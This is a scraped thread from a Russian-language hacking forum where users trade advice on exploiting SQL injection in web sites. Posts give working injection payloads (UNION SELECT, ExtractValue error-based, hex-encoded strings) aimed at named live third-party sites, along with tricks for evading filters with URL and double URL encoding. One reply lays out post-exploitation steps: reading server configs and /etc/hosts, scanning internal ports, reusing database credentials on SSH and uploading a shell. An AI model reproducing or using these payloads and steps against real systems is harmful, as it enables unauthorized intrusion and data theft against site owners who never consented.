Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    Попробуй прочитать конфиги апач\нгинкс, вполне вероятно, что твой сайт и бд находятся на разных серверах, впрочем не исключена возможность, что на сервере БД тоже поднят апач, и сервер доступен из веба, действия аналогичные, читаешь конфиг, получаешь путь, ищешь врайтабельную диру, и льешь. можешь попробовать почитать конфиги настройки сети (например в центосе /etc/sysconfig/network-scripts/ifcfg-eth0 (но скорее всего прав не хватит, раз на раз не приходится)), можешь посмотреть /etc/hosts может там есть, что полезного.

    судя по passwd, на серваке стоит webalizer и memcached, попробуй почитать webalizer, проскань сеть на наличие открытых портов 11211, 3306, глянь логин и пас из mysql.user, попробуй эти пары в сети на порты 22, 3306

    вообще вариантов гора
     
    _________________________
  2. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    обясните как. мне очень интересно. как concat('<?php phpinfo() ?>') будет исполнятся. у меня фантазии не хватает.
    может какой то индус-кодер во сне написал скрипт где параметры переданные скриптом исполняются на стороне сервера. но только из за этого не стоит написать что иногда работает

    это же не метафизика в конце концов
     
    _________________________
  3. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    Скинул пример в ЛС.
    Посмотри скрипты, может будет ясно в чем причина.
     
    _________________________
  4. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163
    возможно как-то раскрутить?)
    Code:
    http://srv3.lookmy.info/portal/13/europeisky/index.php?id=15998&show=4nalbum&do=showgall&gid=28005' 
     
  5. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Эксплуатация сильно затруднена в связи с тем, что фильтруются скобки.
     
    _________________________
  6. Inoms

    Inoms Member

    Joined:
    23 Jun 2013
    Messages:
    103
    Likes Received:
    29
    Reputations:
    45
    На соседних поддоментах имеются более перспективные варианты:
    Code:
    http://generator.lookmy.info/index.php?id=2677&show=4nalbum&do=showgall&gid=3471 union select 1,@@version,3,4,5,6,7,8-- w
    хотя и там не всё так "светло"
     
  7. madhatter

    madhatter Member

    Joined:
    7 Aug 2013
    Messages:
    562
    Likes Received:
    50
    Reputations:
    54
    Возможно, не стоит танцевать с фильтрами, а просто попинать все из http://srv3.lookmy.info/portal/13/ ? К тому же, там лежат многие бекапы, а порт мускула открыт в мир.
     
  8. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    Code:
    [I]?id=%001'or(ExtractValue(1,con[/I][I]cat(0x3a,(select(count(*))fr[/I][I]om(website.user)))))or'[/I]
    
    No problem
    Code:
    [I]28006[/I][I]%20and%200%20UNIO[/I][I]N%20SELECT%200x3120616e64203[/I][I]020554e494f4e2053454c454354[/I][I]2076657273696f6[/I][I]e28292c2032202d2d[/I]
    
    Первая скуля подходит даже больше, чем вторая. Инъекция в категориях, там обычно всегда более 1 запроса.
     
    #23268 randman, 24 May 2014
    Last edited: 8 Jul 2014
    3 people like this.
  9. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    как обойти фильтрацию очки при mysql запросе?
     
  10. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    %2e
    %252e
     
    _________________________
    1 person likes this.
  11. psihoz26

    psihoz26 Members of Antichat

    Joined:
    22 Nov 2010
    Messages:
    545
    Likes Received:
    159
    Reputations:
    324
    Иногда бывает что фильтры не работают при пост запросе
     
  12. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    спс, а как из точки получить такое содержимое, что это за тип шифрования?
    я примерно догадываюсь что это может быть хекс, только вместо 0х поставили % но как получили второй вариант?

    ---------------------------------------------
    никто не в курсе чтоза движок в котором префикс таблиц в БД начинается на pmd, pmd_admin, pmd_users и тд,?? уже насобиралась куча таких сайтов и никак не могу найти админку
     
    #23272 qaz, 29 May 2014
    Last edited: 29 May 2014
  13. recfrf

    recfrf Member

    Joined:
    22 Aug 2008
    Messages:
    21
    Likes Received:
    6
    Reputations:
    0
    у phpMyDirectory такие.
    site.com/cp/
     
    1 person likes this.
  14. Inoms

    Inoms Member

    Joined:
    23 Jun 2013
    Messages:
    103
    Likes Received:
    29
    Reputations:
    45
    qaz, это обычный url енкодинг, то бишь хекс с префиксом процента.
    Иногда бывает, что один параметр участвует в двух запросах, передается с одного хоста на другой, на котором может стоять обработчик всех параметров или на самом хосте они дважды декодируются по каким-либо причинам. Как параметр пройдёт первый хост, он декодируется в привычную форму и из %2527 как пример получится %27 и этот %27 уже на втором хосте в конечном итоге превратится в привычный всем нам апостроф ' :)
     
    2 people like this.
  15. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    http://web-master.pp.ru/info/05.shtml
    Помогает когда фильтруются и другие символы.

    %2e url кодирование.
    %252e двойное url кодирование.
     
    _________________________
  16. Aniweste

    Aniweste Member

    Joined:
    28 May 2010
    Messages:
    70
    Likes Received:
    12
    Reputations:
    1
    Имеется уязвимость на site.com , вида site.com/x.php?id=-1' union+select+1,2,3,4,5,6,7,8,9,10-- '
    Колонки на вывод - 1 и 6.
    Вывести через них database(), user() не получается, т.к. в ответ получаю пустое место.
    Зато можно вывести версию :) @@version , version() - 5.0.95-log
    При других запросах на вывод таблиц и т.д. - либо пустое место, вместо результата (как с user() ), либо ошибку Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in

    Есть ли какие-нибудь идеи, как узнать пользователя и текущую базу данных из приведённых мною выше данных? :)
     
  17. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    Aniweste, фильтр? Попробуйте определить, на что. Или length(database()) = 0?
    Code:
    [I]site.com/x.php?id=-1' union+select+US[/I][I]ER,2,3,4,5,DB,7,8,9,10+from+info[/I][I]rmation_schema.PROCESS[/I][I]LIST+WHERE+info+rlik[/I]e[I]+0x50524f43--+[/I]
    
    В information_schema есть почти вся инфа, см. SHOW TABLES FROM information_schema и SELECT * FROM table LIMIT 5 на локалхосте.
     
    #23277 randman, 31 May 2014
    Last edited: 31 May 2014
  18. int

    int Member

    Joined:
    18 May 2011
    Messages:
    80
    Likes Received:
    10
    Reputations:
    6
    Как раскрутить такое:
    Code:
    SELECT * FROM table WHERE ... ORDER by table.field LIMIT $limitstart, $limit
    
    где $limitstart, $limit - не фильтруются.
     
  19. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    Для инъекции в LIMIT после ORDER BY сейчас нет векторов атак (возможно и не будет).
     
    1 person likes this.
  20. Aniweste

    Aniweste Member

    Joined:
    28 May 2010
    Messages:
    70
    Likes Received:
    12
    Reputations:
    1
    Всё равно ошибка Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in.
    Нечаянно, пока дописывал, проверил
    site.com/x.php?id=-1' union+select+1,2,3,4,5,6,7,8,9,10+fro-- - нет ошибки, site.com/x.php?id=-1' union+select+1,2,3,4,5,6,7,8,9,10+from-- - есть ошибка. Но думаю, что это бред :mad:
     
Thread Status:
Not open for further replies.